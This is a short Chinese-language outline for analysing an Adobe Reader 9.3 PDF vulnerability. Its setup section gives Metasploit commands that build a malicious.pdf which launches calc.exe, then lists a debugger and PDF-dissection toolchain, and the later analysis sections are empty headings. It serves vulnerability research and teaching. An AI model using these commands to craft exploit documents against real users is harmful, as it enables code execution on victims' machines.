一 环境准备
1 POC的准备
我们需要在被攻击的机器上面弹出calc.exe
use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit
2 Adober的准备
AdbeRdr930_zh_CN.exe
3 PDFStreamDumper准备
PDFStreamDumper_Setup.exe,用于提取SING表。
4 IDA
5 OD
二 IDA 静态分析
三 OD动态调试
四 总结